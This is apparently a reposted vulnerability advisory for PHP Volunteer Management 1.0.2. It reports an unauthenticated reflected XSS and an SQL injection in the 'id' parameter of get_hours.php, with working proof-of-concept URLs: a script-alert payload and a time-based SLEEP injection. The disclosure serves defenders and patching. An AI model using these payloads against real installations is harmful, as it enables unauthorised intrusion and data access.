标题: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities 作者: G13 HdhCmsTest2cto测试数据 下载 地址: https://sourceforge.net/projects/phpvolunteer/ 影响版本: 1.0.2 0x01 描述 0x02 XSS 0x03 SQL Injection 0x04 Vendor 报告 ##### 0x01概述 ##### This is a PHP Volunteer Management software. Keep track of Volunteer hours worked and location assignments. This system is built on PHP/MySql. ##### 0x02 XSS ##### ---------------缺陷------------------- The 'id' parameter on the get_hours.php page is vulnerable to XSS. No authentication is needed. This is a reflective XSS vulnerability. ----------测试----------------------------------- http://HdhCmsTest2cto测试数据 /mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10 ------------利用--------------------------- http://HdhCmsTest2cto测试数据 /mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10 ##### 0x03 SQL Injection ##### ---------------缺陷------------------- The 'id' parameter on the get_hours.php page is also vulnerable to SQL Injection. No authentication is needed. ----------测试----------------------------------- http://localhost/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10 ------------利用--------------------------- http://localhost/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10 修复: 相应过滤
查看更多关于PHP Volunteer Management 1.0.2多个缺陷及修复 - 网站安的详细内容...